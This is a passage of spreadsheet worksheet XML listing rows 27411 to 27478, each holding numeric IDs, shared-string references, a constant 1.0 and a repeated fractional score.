      </c>
      <c r="F27411" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27412" ht="15.75" customHeight="1">
      <c r="A27412" s="1">
        <v>8953.0</v>
      </c>
      <c r="B27412" s="2">
        <v>5.4924949E7</v>
      </c>
      <c r="C27412" s="2" t="s">
        <v>26347</v>
      </c>
      <c r="D27412" s="2">
        <v>1.0</v>
      </c>
      <c r="E27412" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27412" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27413" ht="15.75" customHeight="1">
      <c r="A27413" s="1">
        <v>8960.0</v>
      </c>
      <c r="B27413" s="2">
        <v>5.4924984E7</v>
      </c>
      <c r="C27413" s="2" t="s">
        <v>26348</v>
      </c>
      <c r="D27413" s="2">
        <v>1.0</v>
      </c>
      <c r="E27413" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27413" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27414" ht="15.75" customHeight="1">
      <c r="A27414" s="1">
        <v>9231.0</v>
      </c>
      <c r="B27414" s="2">
        <v>5.5452548E7</v>
      </c>
      <c r="C27414" s="2" t="s">
        <v>26349</v>
      </c>
      <c r="D27414" s="2">
        <v>1.0</v>
      </c>
      <c r="E27414" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27414" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27415" ht="15.75" customHeight="1">
      <c r="A27415" s="1">
        <v>10540.0</v>
      </c>
      <c r="B27415" s="2">
        <v>1.2411299E7</v>
      </c>
      <c r="C27415" s="2" t="s">
        <v>26350</v>
      </c>
      <c r="D27415" s="2">
        <v>1.0</v>
      </c>
      <c r="E27415" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27415" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27416" ht="15.75" customHeight="1">
      <c r="A27416" s="1">
        <v>11494.0</v>
      </c>
      <c r="B27416" s="2">
        <v>2.2075284E7</v>
      </c>
      <c r="C27416" s="2" t="s">
        <v>26351</v>
      </c>
      <c r="D27416" s="2">
        <v>1.0</v>
      </c>
      <c r="E27416" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27416" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27417" ht="15.75" customHeight="1">
      <c r="A27417" s="1">
        <v>11688.0</v>
      </c>
      <c r="B27417" s="2">
        <v>2.3447561E7</v>
      </c>
      <c r="C27417" s="2" t="s">
        <v>26352</v>
      </c>
      <c r="D27417" s="2">
        <v>1.0</v>
      </c>
      <c r="E27417" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27417" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27418" ht="15.75" customHeight="1">
      <c r="A27418" s="1">
        <v>11760.0</v>
      </c>
      <c r="B27418" s="2">
        <v>2.4174779E7</v>
      </c>
      <c r="C27418" s="2" t="s">
        <v>26353</v>
      </c>
      <c r="D27418" s="2">
        <v>1.0</v>
      </c>
      <c r="E27418" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27418" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27419" ht="15.75" customHeight="1">
      <c r="A27419" s="1">
        <v>11923.0</v>
      </c>
      <c r="B27419" s="2">
        <v>2.5351065E7</v>
      </c>
      <c r="C27419" s="2" t="s">
        <v>26354</v>
      </c>
      <c r="D27419" s="2">
        <v>1.0</v>
      </c>
      <c r="E27419" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27419" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27420" ht="15.75" customHeight="1">
      <c r="A27420" s="1">
        <v>12236.0</v>
      </c>
      <c r="B27420" s="2">
        <v>2.7865678E7</v>
      </c>
      <c r="C27420" s="2" t="s">
        <v>26355</v>
      </c>
      <c r="D27420" s="2">
        <v>1.0</v>
      </c>
      <c r="E27420" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27420" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27421" ht="15.75" customHeight="1">
      <c r="A27421" s="1">
        <v>12585.0</v>
      </c>
      <c r="B27421" s="2">
        <v>3.0033345E7</v>
      </c>
      <c r="C27421" s="2" t="s">
        <v>26356</v>
      </c>
      <c r="D27421" s="2">
        <v>1.0</v>
      </c>
      <c r="E27421" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27421" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27422" ht="15.75" customHeight="1">
      <c r="A27422" s="1">
        <v>12715.0</v>
      </c>
      <c r="B27422" s="2">
        <v>3.0855884E7</v>
      </c>
      <c r="C27422" s="2" t="s">
        <v>26357</v>
      </c>
      <c r="D27422" s="2">
        <v>1.0</v>
      </c>
      <c r="E27422" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27422" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27423" ht="15.75" customHeight="1">
      <c r="A27423" s="1">
        <v>12893.0</v>
      </c>
      <c r="B27423" s="2">
        <v>3.2059114E7</v>
      </c>
      <c r="C27423" s="2" t="s">
        <v>26358</v>
      </c>
      <c r="D27423" s="2">
        <v>1.0</v>
      </c>
      <c r="E27423" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27423" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27424" ht="15.75" customHeight="1">
      <c r="A27424" s="1">
        <v>13299.0</v>
      </c>
      <c r="B27424" s="2">
        <v>3.4483441E7</v>
      </c>
      <c r="C27424" s="2" t="s">
        <v>26359</v>
      </c>
      <c r="D27424" s="2">
        <v>1.0</v>
      </c>
      <c r="E27424" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27424" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27425" ht="15.75" customHeight="1">
      <c r="A27425" s="1">
        <v>13569.0</v>
      </c>
      <c r="B27425" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C27425" s="2" t="s">
        <v>26360</v>
      </c>
      <c r="D27425" s="2">
        <v>1.0</v>
      </c>
      <c r="E27425" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27425" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27426" ht="15.75" customHeight="1">
      <c r="A27426" s="1">
        <v>13677.0</v>
      </c>
      <c r="B27426" s="2">
        <v>3.6052387E7</v>
      </c>
      <c r="C27426" s="2" t="s">
        <v>26361</v>
      </c>
      <c r="D27426" s="2">
        <v>1.0</v>
      </c>
      <c r="E27426" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27426" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27427" ht="15.75" customHeight="1">
      <c r="A27427" s="1">
        <v>13723.0</v>
      </c>
      <c r="B27427" s="2">
        <v>3.634887E7</v>
      </c>
      <c r="C27427" s="2" t="s">
        <v>26362</v>
      </c>
      <c r="D27427" s="2">
        <v>1.0</v>
      </c>
      <c r="E27427" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27427" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27428" ht="15.75" customHeight="1">
      <c r="A27428" s="1">
        <v>13876.0</v>
      </c>
      <c r="B27428" s="2">
        <v>3.6985298E7</v>
      </c>
      <c r="C27428" s="2" t="s">
        <v>26363</v>
      </c>
      <c r="D27428" s="2">
        <v>1.0</v>
      </c>
      <c r="E27428" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27428" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27429" ht="15.75" customHeight="1">
      <c r="A27429" s="1">
        <v>13877.0</v>
      </c>
      <c r="B27429" s="2">
        <v>3.6985298E7</v>
      </c>
      <c r="C27429" s="2" t="s">
        <v>26364</v>
      </c>
      <c r="D27429" s="2">
        <v>1.0</v>
      </c>
      <c r="E27429" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27429" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27430" ht="15.75" customHeight="1">
      <c r="A27430" s="1">
        <v>13980.0</v>
      </c>
      <c r="B27430" s="2">
        <v>3.7345123E7</v>
      </c>
      <c r="C27430" s="2" t="s">
        <v>26365</v>
      </c>
      <c r="D27430" s="2">
        <v>1.0</v>
      </c>
      <c r="E27430" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27430" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27431" ht="15.75" customHeight="1">
      <c r="A27431" s="1">
        <v>14024.0</v>
      </c>
      <c r="B27431" s="2">
        <v>3.7501257E7</v>
      </c>
      <c r="C27431" s="2" t="s">
        <v>26366</v>
      </c>
      <c r="D27431" s="2">
        <v>1.0</v>
      </c>
      <c r="E27431" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27431" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27432" ht="15.75" customHeight="1">
      <c r="A27432" s="1">
        <v>14127.0</v>
      </c>
      <c r="B27432" s="2">
        <v>3.789356E7</v>
      </c>
      <c r="C27432" s="2" t="s">
        <v>26367</v>
      </c>
      <c r="D27432" s="2">
        <v>1.0</v>
      </c>
      <c r="E27432" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27432" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27433" ht="15.75" customHeight="1">
      <c r="A27433" s="1">
        <v>14595.0</v>
      </c>
      <c r="B27433" s="2">
        <v>4.0237307E7</v>
      </c>
      <c r="C27433" s="2" t="s">
        <v>26368</v>
      </c>
      <c r="D27433" s="2">
        <v>1.0</v>
      </c>
      <c r="E27433" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27433" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27434" ht="15.75" customHeight="1">
      <c r="A27434" s="1">
        <v>14609.0</v>
      </c>
      <c r="B27434" s="2">
        <v>4.0251502E7</v>
      </c>
      <c r="C27434" s="2" t="s">
        <v>26369</v>
      </c>
      <c r="D27434" s="2">
        <v>1.0</v>
      </c>
      <c r="E27434" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27434" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27435" ht="15.75" customHeight="1">
      <c r="A27435" s="1">
        <v>14787.0</v>
      </c>
      <c r="B27435" s="2">
        <v>4.0918163E7</v>
      </c>
      <c r="C27435" s="2" t="s">
        <v>26370</v>
      </c>
      <c r="D27435" s="2">
        <v>1.0</v>
      </c>
      <c r="E27435" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27435" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27436" ht="15.75" customHeight="1">
      <c r="A27436" s="1">
        <v>14891.0</v>
      </c>
      <c r="B27436" s="2">
        <v>4.1129678E7</v>
      </c>
      <c r="C27436" s="2" t="s">
        <v>26371</v>
      </c>
      <c r="D27436" s="2">
        <v>1.0</v>
      </c>
      <c r="E27436" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27436" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27437" ht="15.75" customHeight="1">
      <c r="A27437" s="1">
        <v>15573.0</v>
      </c>
      <c r="B27437" s="2">
        <v>4.3437518E7</v>
      </c>
      <c r="C27437" s="2" t="s">
        <v>26372</v>
      </c>
      <c r="D27437" s="2">
        <v>1.0</v>
      </c>
      <c r="E27437" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27437" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27438" ht="15.75" customHeight="1">
      <c r="A27438" s="1">
        <v>15860.0</v>
      </c>
      <c r="B27438" s="2">
        <v>4.4483449E7</v>
      </c>
      <c r="C27438" s="2" t="s">
        <v>26373</v>
      </c>
      <c r="D27438" s="2">
        <v>1.0</v>
      </c>
      <c r="E27438" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27438" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27439" ht="15.75" customHeight="1">
      <c r="A27439" s="1">
        <v>16201.0</v>
      </c>
      <c r="B27439" s="2">
        <v>4.5665745E7</v>
      </c>
      <c r="C27439" s="2" t="s">
        <v>26374</v>
      </c>
      <c r="D27439" s="2">
        <v>1.0</v>
      </c>
      <c r="E27439" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27439" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27440" ht="15.75" customHeight="1">
      <c r="A27440" s="1">
        <v>16482.0</v>
      </c>
      <c r="B27440" s="2">
        <v>4.652834E7</v>
      </c>
      <c r="C27440" s="2" t="s">
        <v>26375</v>
      </c>
      <c r="D27440" s="2">
        <v>1.0</v>
      </c>
      <c r="E27440" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27440" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27441" ht="15.75" customHeight="1">
      <c r="A27441" s="1">
        <v>17359.0</v>
      </c>
      <c r="B27441" s="2">
        <v>4.9445046E7</v>
      </c>
      <c r="C27441" s="2" t="s">
        <v>26376</v>
      </c>
      <c r="D27441" s="2">
        <v>1.0</v>
      </c>
      <c r="E27441" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27441" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27442" ht="15.75" customHeight="1">
      <c r="A27442" s="1">
        <v>17608.0</v>
      </c>
      <c r="B27442" s="2">
        <v>5.0360815E7</v>
      </c>
      <c r="C27442" s="2" t="s">
        <v>26377</v>
      </c>
      <c r="D27442" s="2">
        <v>1.0</v>
      </c>
      <c r="E27442" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27442" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27443" ht="15.75" customHeight="1">
      <c r="A27443" s="1">
        <v>18349.0</v>
      </c>
      <c r="B27443" s="2">
        <v>5.2477419E7</v>
      </c>
      <c r="C27443" s="2" t="s">
        <v>26378</v>
      </c>
      <c r="D27443" s="2">
        <v>1.0</v>
      </c>
      <c r="E27443" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27443" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27444" ht="15.75" customHeight="1">
      <c r="A27444" s="1">
        <v>18499.0</v>
      </c>
      <c r="B27444" s="2">
        <v>5.294294E7</v>
      </c>
      <c r="C27444" s="2" t="s">
        <v>26379</v>
      </c>
      <c r="D27444" s="2">
        <v>1.0</v>
      </c>
      <c r="E27444" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27444" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27445" ht="15.75" customHeight="1">
      <c r="A27445" s="1">
        <v>18805.0</v>
      </c>
      <c r="B27445" s="2">
        <v>5.3882753E7</v>
      </c>
      <c r="C27445" s="2" t="s">
        <v>26380</v>
      </c>
      <c r="D27445" s="2">
        <v>1.0</v>
      </c>
      <c r="E27445" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27445" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27446" ht="15.75" customHeight="1">
      <c r="A27446" s="1">
        <v>19261.0</v>
      </c>
      <c r="B27446" s="2">
        <v>5.5128777E7</v>
      </c>
      <c r="C27446" s="2" t="s">
        <v>26381</v>
      </c>
      <c r="D27446" s="2">
        <v>1.0</v>
      </c>
      <c r="E27446" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27446" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27447" ht="15.75" customHeight="1">
      <c r="A27447" s="1">
        <v>19422.0</v>
      </c>
      <c r="B27447" s="2">
        <v>5.5664422E7</v>
      </c>
      <c r="C27447" s="2" t="s">
        <v>26382</v>
      </c>
      <c r="D27447" s="2">
        <v>1.0</v>
      </c>
      <c r="E27447" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27447" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27448" ht="15.75" customHeight="1">
      <c r="A27448" s="1">
        <v>19443.0</v>
      </c>
      <c r="B27448" s="2">
        <v>5.5717081E7</v>
      </c>
      <c r="C27448" s="2" t="s">
        <v>26383</v>
      </c>
      <c r="D27448" s="2">
        <v>1.0</v>
      </c>
      <c r="E27448" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27448" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27449" ht="15.75" customHeight="1">
      <c r="A27449" s="1">
        <v>20147.0</v>
      </c>
      <c r="B27449" s="2">
        <v>1.0198717E7</v>
      </c>
      <c r="C27449" s="2" t="s">
        <v>26384</v>
      </c>
      <c r="D27449" s="2">
        <v>1.0</v>
      </c>
      <c r="E27449" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27449" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27450" ht="15.75" customHeight="1">
      <c r="A27450" s="1">
        <v>20275.0</v>
      </c>
      <c r="B27450" s="2">
        <v>1.1140906E7</v>
      </c>
      <c r="C27450" s="2" t="s">
        <v>26385</v>
      </c>
      <c r="D27450" s="2">
        <v>1.0</v>
      </c>
      <c r="E27450" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27450" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27451" ht="15.75" customHeight="1">
      <c r="A27451" s="1">
        <v>20439.0</v>
      </c>
      <c r="B27451" s="2">
        <v>1.2403769E7</v>
      </c>
      <c r="C27451" s="2" t="s">
        <v>26386</v>
      </c>
      <c r="D27451" s="2">
        <v>1.0</v>
      </c>
      <c r="E27451" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27451" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27452" ht="15.75" customHeight="1">
      <c r="A27452" s="1">
        <v>20571.0</v>
      </c>
      <c r="B27452" s="2">
        <v>1.3586725E7</v>
      </c>
      <c r="C27452" s="2" t="s">
        <v>26387</v>
      </c>
      <c r="D27452" s="2">
        <v>1.0</v>
      </c>
      <c r="E27452" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27452" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27453" ht="15.75" customHeight="1">
      <c r="A27453" s="1">
        <v>20630.0</v>
      </c>
      <c r="B27453" s="2">
        <v>1.4127701E7</v>
      </c>
      <c r="C27453" s="2" t="s">
        <v>26388</v>
      </c>
      <c r="D27453" s="2">
        <v>1.0</v>
      </c>
      <c r="E27453" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27453" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27454" ht="15.75" customHeight="1">
      <c r="A27454" s="1">
        <v>20765.0</v>
      </c>
      <c r="B27454" s="2">
        <v>1.4950705E7</v>
      </c>
      <c r="C27454" s="2" t="s">
        <v>26389</v>
      </c>
      <c r="D27454" s="2">
        <v>1.0</v>
      </c>
      <c r="E27454" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27454" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27455" ht="15.75" customHeight="1">
      <c r="A27455" s="1">
        <v>21769.0</v>
      </c>
      <c r="B27455" s="2">
        <v>2.6359516E7</v>
      </c>
      <c r="C27455" s="2" t="s">
        <v>26390</v>
      </c>
      <c r="D27455" s="2">
        <v>1.0</v>
      </c>
      <c r="E27455" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27455" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27456" ht="15.75" customHeight="1">
      <c r="A27456" s="1">
        <v>22436.0</v>
      </c>
      <c r="B27456" s="2">
        <v>3.6207908E7</v>
      </c>
      <c r="C27456" s="2" t="s">
        <v>26391</v>
      </c>
      <c r="D27456" s="2">
        <v>1.0</v>
      </c>
      <c r="E27456" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27456" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27457" ht="15.75" customHeight="1">
      <c r="A27457" s="1">
        <v>22437.0</v>
      </c>
      <c r="B27457" s="2">
        <v>3.6211656E7</v>
      </c>
      <c r="C27457" s="2" t="s">
        <v>26392</v>
      </c>
      <c r="D27457" s="2">
        <v>1.0</v>
      </c>
      <c r="E27457" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27457" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27458" ht="15.75" customHeight="1">
      <c r="A27458" s="1">
        <v>22438.0</v>
      </c>
      <c r="B27458" s="2">
        <v>3.6211716E7</v>
      </c>
      <c r="C27458" s="2" t="s">
        <v>26392</v>
      </c>
      <c r="D27458" s="2">
        <v>1.0</v>
      </c>
      <c r="E27458" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27458" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27459" ht="15.75" customHeight="1">
      <c r="A27459" s="1">
        <v>22620.0</v>
      </c>
      <c r="B27459" s="2">
        <v>4.0084329E7</v>
      </c>
      <c r="C27459" s="2" t="s">
        <v>26393</v>
      </c>
      <c r="D27459" s="2">
        <v>1.0</v>
      </c>
      <c r="E27459" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27459" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27460" ht="15.75" customHeight="1">
      <c r="A27460" s="1">
        <v>22703.0</v>
      </c>
      <c r="B27460" s="2">
        <v>4.2702816E7</v>
      </c>
      <c r="C27460" s="2" t="s">
        <v>26394</v>
      </c>
      <c r="D27460" s="2">
        <v>1.0</v>
      </c>
      <c r="E27460" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27460" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27461" ht="15.75" customHeight="1">
      <c r="A27461" s="1">
        <v>23160.0</v>
      </c>
      <c r="B27461" s="2">
        <v>5192461.0</v>
      </c>
      <c r="C27461" s="2" t="s">
        <v>26395</v>
      </c>
      <c r="D27461" s="2">
        <v>1.0</v>
      </c>
      <c r="E27461" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27461" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27462" ht="15.75" customHeight="1">
      <c r="A27462" s="1">
        <v>23431.0</v>
      </c>
      <c r="B27462" s="2">
        <v>5.6461688E7</v>
      </c>
      <c r="C27462" s="2" t="s">
        <v>26396</v>
      </c>
      <c r="D27462" s="2">
        <v>1.0</v>
      </c>
      <c r="E27462" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27462" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27463" ht="15.75" customHeight="1">
      <c r="A27463" s="1">
        <v>24123.0</v>
      </c>
      <c r="B27463" s="2">
        <v>1.0012419E7</v>
      </c>
      <c r="C27463" s="2" t="s">
        <v>26397</v>
      </c>
      <c r="D27463" s="2">
        <v>1.0</v>
      </c>
      <c r="E27463" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27463" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27464" ht="15.75" customHeight="1">
      <c r="A27464" s="1">
        <v>24512.0</v>
      </c>
      <c r="B27464" s="2">
        <v>1.1140905E7</v>
      </c>
      <c r="C27464" s="2" t="s">
        <v>26385</v>
      </c>
      <c r="D27464" s="2">
        <v>1.0</v>
      </c>
      <c r="E27464" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27464" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27465" ht="15.75" customHeight="1">
      <c r="A27465" s="1">
        <v>25167.0</v>
      </c>
      <c r="B27465" s="2">
        <v>1.3092512E7</v>
      </c>
      <c r="C27465" s="2" t="s">
        <v>26398</v>
      </c>
      <c r="D27465" s="2">
        <v>1.0</v>
      </c>
      <c r="E27465" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27465" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27466" ht="15.75" customHeight="1">
      <c r="A27466" s="1">
        <v>25328.0</v>
      </c>
      <c r="B27466" s="2">
        <v>1.3471365E7</v>
      </c>
      <c r="C27466" s="2" t="s">
        <v>26399</v>
      </c>
      <c r="D27466" s="2">
        <v>1.0</v>
      </c>
      <c r="E27466" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27466" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27467" ht="15.75" customHeight="1">
      <c r="A27467" s="1">
        <v>25502.0</v>
      </c>
      <c r="B27467" s="2">
        <v>1.41277E7</v>
      </c>
      <c r="C27467" s="2" t="s">
        <v>26400</v>
      </c>
      <c r="D27467" s="2">
        <v>1.0</v>
      </c>
      <c r="E27467" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27467" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27468" ht="15.75" customHeight="1">
      <c r="A27468" s="1">
        <v>25504.0</v>
      </c>
      <c r="B27468" s="2">
        <v>1.4138873E7</v>
      </c>
      <c r="C27468" s="2" t="s">
        <v>26401</v>
      </c>
      <c r="D27468" s="2">
        <v>1.0</v>
      </c>
      <c r="E27468" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27468" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27469" ht="15.75" customHeight="1">
      <c r="A27469" s="1">
        <v>25791.0</v>
      </c>
      <c r="B27469" s="2">
        <v>1.4674387E7</v>
      </c>
      <c r="C27469" s="2" t="s">
        <v>26402</v>
      </c>
      <c r="D27469" s="2">
        <v>1.0</v>
      </c>
      <c r="E27469" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27469" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27470" ht="15.75" customHeight="1">
      <c r="A27470" s="1">
        <v>25796.0</v>
      </c>
      <c r="B27470" s="2">
        <v>1.4674387E7</v>
      </c>
      <c r="C27470" s="2" t="s">
        <v>26403</v>
      </c>
      <c r="D27470" s="2">
        <v>1.0</v>
      </c>
      <c r="E27470" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27470" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27471" ht="15.75" customHeight="1">
      <c r="A27471" s="1">
        <v>26037.0</v>
      </c>
      <c r="B27471" s="2">
        <v>1.5441799E7</v>
      </c>
      <c r="C27471" s="2" t="s">
        <v>26404</v>
      </c>
      <c r="D27471" s="2">
        <v>1.0</v>
      </c>
      <c r="E27471" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27471" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27472" ht="15.75" customHeight="1">
      <c r="A27472" s="1">
        <v>26358.0</v>
      </c>
      <c r="B27472" s="2">
        <v>1.6843208E7</v>
      </c>
      <c r="C27472" s="2" t="s">
        <v>26405</v>
      </c>
      <c r="D27472" s="2">
        <v>1.0</v>
      </c>
      <c r="E27472" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27472" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27473" ht="15.75" customHeight="1">
      <c r="A27473" s="1">
        <v>26798.0</v>
      </c>
      <c r="B27473" s="2">
        <v>1.864205E7</v>
      </c>
      <c r="C27473" s="2" t="s">
        <v>26406</v>
      </c>
      <c r="D27473" s="2">
        <v>1.0</v>
      </c>
      <c r="E27473" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27473" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27474" ht="15.75" customHeight="1">
      <c r="A27474" s="1">
        <v>27163.0</v>
      </c>
      <c r="B27474" s="2">
        <v>2.0814406E7</v>
      </c>
      <c r="C27474" s="2" t="s">
        <v>26407</v>
      </c>
      <c r="D27474" s="2">
        <v>1.0</v>
      </c>
      <c r="E27474" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27474" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27475" ht="15.75" customHeight="1">
      <c r="A27475" s="1">
        <v>27606.0</v>
      </c>
      <c r="B27475" s="2">
        <v>2.262855E7</v>
      </c>
      <c r="C27475" s="2" t="s">
        <v>26408</v>
      </c>
      <c r="D27475" s="2">
        <v>1.0</v>
      </c>
      <c r="E27475" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27475" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27476" ht="15.75" customHeight="1">
      <c r="A27476" s="1">
        <v>27694.0</v>
      </c>
      <c r="B27476" s="2">
        <v>2.3011771E7</v>
      </c>
      <c r="C27476" s="2" t="s">
        <v>26409</v>
      </c>
      <c r="D27476" s="2">
        <v>1.0</v>
      </c>
      <c r="E27476" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27476" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27477" ht="15.75" customHeight="1">
      <c r="A27477" s="1">
        <v>28017.0</v>
      </c>
      <c r="B27477" s="2">
        <v>2.4360804E7</v>
      </c>
      <c r="C27477" s="2" t="s">
        <v>26410</v>
      </c>
      <c r="D27477" s="2">
        <v>1.0</v>
      </c>
      <c r="E27477" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27477" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27478" ht="15.75" customHeight="1">
      <c r="A27478" s="1">
        <v>29066.0</v>
      </c>
      <c r="B27478" s="2">
        <v>3.0286567E7</v>
      </c>
      <c r="C27478" s="2" t="s">
        <v>26411</v>
      </c>
      <c r="D27478" s="2">
        <v>1.0</v>
      </c>
      <c r="E27478" s="3" t="s">
        <v>24318</v>
